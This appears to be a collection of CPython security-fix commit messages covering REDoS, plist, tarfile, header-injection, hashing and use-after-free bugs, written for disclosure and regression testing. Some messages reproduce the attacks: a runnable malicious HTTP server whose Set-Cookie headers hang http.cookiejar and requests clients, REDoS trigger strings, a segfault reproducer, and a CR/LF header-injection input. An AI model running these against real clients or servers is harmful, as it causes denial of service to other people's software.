The existing volatile `left`/`right` pointers guarantee that the reads all occur, but do not guarantee that their results are _used_. A compiler can therefore still short-circuit the loop, saving e.g. the overhead of doing the XORs and especially the overhead of the data dependency between `result` and the reads. That would make performance depend on where the first unequal byte occurs. This change prevents that optimization.
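For context, this is the constant-time comparison behind hmac.compare_digest / secrets.compare_digest. A minimal Python-level sketch of the property being protected (assuming nothing beyond the standard library): the time taken should not depend on where the first mismatch sits.

import hmac
import timeit

secret = b"s" * 4096
early = b"X" + b"s" * 4095   # differs at the first byte
late = b"s" * 4095 + b"X"    # differs at the last byte

# A plain == comparison may stop at the first differing byte, so "early" and
# "late" can take measurably different time; compare_digest is intended to
# take the same time regardless of where the mismatch occurs.
for label, fn in (("==", lambda a, b: a == b), ("compare_digest", hmac.compare_digest)):
    t_early = timeit.timeit(lambda: fn(secret, early), number=20000)
    t_late = timeit.timeit(lambda: fn(secret, late), number=20000)
    print(f"{label:15s} early={t_early:.4f}s  late={t_late:.4f}s")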
(This is change GH-1 from https://bugs.python.org/issue40791 .)
(cherry picked from commit 31729366e2)
Co-authored-by: Devin Jeanpierre <jeanpierreda@google.com>
Fix an assertion error in format() in debug builds for floating point
formatting with the "n" format, zero padding and a small width. Release builds
are not affected. Patch by Karthikeyan Singaravelan.
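For reference, the kind of call described above looks like this (an illustrative shape, not necessarily the exact input that tripped the assertion):

# Floating point formatting with the locale-aware "n" type, zero padding and a
# small width -- the combination described above. On a release build this just
# returns a padded string.
print(format(12.34, "06n"))   # '012.34' in the C locale
print(format(1234.5, "03n"))  # width smaller than the result, so no padding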
(cherry picked from commit 3f7983a25a)
Co-authored-by: Xtreak <tir.karthi@gmail.com>
* Prevent some possible DoS attacks via invalid Plist files
with an extremely large number of objects or collection sizes.
* Raise InvalidFileException for overly large bytes and string sizes instead of returning garbage (see the handling sketch below).
* Raise InvalidFileException instead of ValueError for a specific invalid datetime (NaN).
* Raise InvalidFileException instead of TypeError for non-hashable dict keys.
* Add more tests for invalid Plist files.
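A minimal defensive-loading sketch, assuming only the standard library; with the hardening above, malformed or hostile plists are expected to surface as plistlib.InvalidFileException rather than as ValueError/TypeError or bogus objects:

import plistlib

def load_untrusted_plist(data: bytes):
    try:
        return plistlib.loads(data)
    except plistlib.InvalidFileException:
        return None  # reject the input instead of trusting garbage

# usage (untrusted_bytes is whatever arrived over the wire):
#     config = load_untrusted_plist(untrusted_bytes)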
(cherry picked from commit 34637a0ce2)
Co-authored-by: Serhiy Storchaka <storchaka@gmail.com>
Reject control characters in the HTTP method in http.client.putrequest() to prevent HTTP header injection.
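A hedged sketch of the new behavior: a method string carrying CR/LF would otherwise be written straight into the request line; with this change it is expected to be rejected with ValueError before anything is sent.

import http.client

# putrequest() only buffers the request line, so no connection to
# example.invalid is attempted here.
conn = http.client.HTTPConnection("example.invalid")
try:
    conn.putrequest("GET\r\nX-Injected: 1", "/")  # CR/LF smuggled into the method
except ValueError as exc:
    print("rejected:", exc)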
(cherry picked from commit 8ca8a2e8fb)
Co-authored-by: AMIR <31338382+amiremohamadi@users.noreply.github.com>
Avoid an infinite loop when reading specially crafted TAR files using the tarfile module
(CVE-2019-20907).
(cherry picked from commit 5a8d121a1f)
Co-authored-by: Rishi <rishi_devan@mail.com>
* bpo-29778: Ensure python3.dll is loaded from correct locations when Python is embedded (GH-21298)
* bpo-29778: Ensure python3.dll is loaded from correct locations when Python is embedded.
* Add CVE number
* Updates for 3.6
CVE-2020-14422
The __hash__() methods of the IPv4Interface and IPv6Interface classes
generated constant hash values of 32 and 128 respectively, causing hash collisions.
The fix uses the hash() function to generate hash values for the objects
instead of an XOR operation.
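An illustration of why constant hashes matter (a sketch, not the patch itself): every colliding key lands in the same hash bucket, so dict and set operations on interface objects degrade to linear scans.

import ipaddress

a = ipaddress.ip_interface("10.0.0.1/24")
b = ipaddress.ip_interface("192.168.1.1/16")

# Before the fix both objects reportedly hashed to the same constant, so a
# set/dict holding many interfaces probed one long collision chain. After the
# fix, distinct interfaces generally hash differently (collisions remain
# possible, as for any hash function).
print(hash(a), hash(b))
print(len({a, b}))  # 2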
(cherry picked from commit b30ee26e36)
Co-authored-by: Ravi Teja P <rvteja92@gmail.com>
Signed-off-by: Tapas Kundu <tkundu@vmware.com>
The AbstractBasicAuthHandler class of the urllib.request module uses
an inefficient regular expression which can be exploited by an
attacker to cause a denial of service. Fix the regex to prevent
catastrophic backtracking. Vulnerability reported by Ben Caller
and Matt Schwager.
AbstractBasicAuthHandler of urllib.request now parses all
WWW-Authenticate HTTP headers and accepts multiple challenges per
header: the realm of the first Basic challenge is used.
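An illustrative timing sketch of the kind of ambiguity described above, using a pattern with the same "(?:.*,)*" structure (an assumption for illustration, not necessarily the exact regex that shipped):

import re
import time

ambiguous = re.compile(r'(?:.*,)*[ \t]*([^ \t]+)[ \t]+realm=(["\']?)([^"\']*)\2', re.I)

for n in (10, 14, 18):
    header = "Basic " + "," * n  # contains no realm=, so the match has to fail
    start = time.perf_counter()
    ambiguous.match(header)
    # The time roughly doubles with each extra comma -- classic catastrophic
    # backtracking, which is what the fixed regex avoids.
    print(n, f"{time.perf_counter() - start:.4f}s")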
Co-Authored-By: Serhiy Storchaka <storchaka@gmail.com>
(cherry picked from commit 0b297d4ff1)
Validate the host for control characters to provide further protection against CVE-2019-18348.
(cherry picked from commit 9165addc22)
Co-authored-by: Ashwin Ramaswami <aramaswamis@gmail.com>
When called on a closed object, readinto() segfaults on account
of a write to a freed buffer:
==220553== Process terminating with default action of signal 11 (SIGSEGV): dumping core
==220553== Access not within mapped region at address 0x2A
==220553== at 0x48408A0: memmove (vg_replace_strmem.c:1272)
==220553== by 0x58DB0C: _buffered_readinto_generic (bufferedio.c:972)
==220553== by 0x58DCBA: _io__Buffered_readinto_impl (bufferedio.c:1053)
==220553== by 0x58DCBA: _io__Buffered_readinto (bufferedio.c.h:253)
Reproducer:
reader = open("/dev/zero", "rb")
_void = reader.read(42)
reader.close()
reader.readinto(bytearray(42))  # BANG!
The problem has existed since 2012, when commit dc469454ec added code
to free the read buffer on close().
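With the fix in place, the same sequence is expected to fail cleanly rather than crash (a sketch; the exact error message may differ):

reader = open("/dev/zero", "rb")
reader.read(42)
reader.close()
try:
    reader.readinto(bytearray(42))
except ValueError as exc:   # e.g. "readinto of closed file" instead of a segfault
    print("rejected:", exc)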
Signed-off-by: Philipp Gesang <philipp.gesang@intra2net.com>
(cherry picked from commit cb1c0746f2)
Co-authored-by: Philipp Gesang <phg@phi-gamma.net>
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).
LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and block execution for a long time.
The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups, the regex could be simplified to
\d+-\w+-\d+(\s*\s*\s*)$
Therefore, a long sequence of spaces can trigger bad performance.
Matching a malicious string such as
LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")
caused catastrophic backtracking.
The fix removes ambiguity about which \s* should match a particular
space.
You can create a malicious server which responds with Set-Cookie headers
to attack all Python programs that access it, e.g.:
from http.server import BaseHTTPRequestHandler, HTTPServer

def make_set_cookie_value(n_spaces):
    spaces = " " * n_spaces
    expiry = f"1-c-1{spaces}!"
    return f"b;Expires={expiry}"

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.log_request(204)
        self.send_response_only(204)  # Don't bother sending Server and Date
        n_spaces = (
            int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
            if len(self.path) > 1 else
            65506  # Max header line length 65536
        )
        value = make_set_cookie_value(n_spaces)
        for i in range(99):  # Not necessary, but we can have up to 100 header lines
            self.send_header("Set-Cookie", value)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("", 44020), Handler).serve_forever()
This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.
Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :
import http.cookiejar, urllib.request
cj = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
r = opener.open("http://localhost:44020/")
The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):
import requests
requests.get("http://localhost:44020/")
* Regression test for http.cookiejar REDoS
If we regress, this test will take a very long time.
* Improve performance of http.cookiejar.ISO_DATE_RE
A string like
"444444" + (" " * 2000) + "A"
could cause poor performance due to the two overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was
(see the timing sketch below).
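A quick way to sanity-check both fixed patterns (a sketch using the module-level regexes; with the fixes, both matches should return almost instantly):

import time
from http.cookiejar import ISO_DATE_RE, LOOSE_HTTP_DATE_RE

for name, rx, s in (
    ("LOOSE_HTTP_DATE_RE", LOOSE_HTTP_DATE_RE, "1-c-1" + " " * 2000 + "!"),
    ("ISO_DATE_RE", ISO_DATE_RE, "444444" + " " * 2000 + "A"),
):
    start = time.perf_counter()
    rx.match(s)  # the malicious strings from above; neither should hang now
    print(f"{name}: {time.perf_counter() - start:.4f}s")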
(cherry picked from commit 1b779bfb85)
Co-authored-by: bcaller <bcaller@users.noreply.github.com>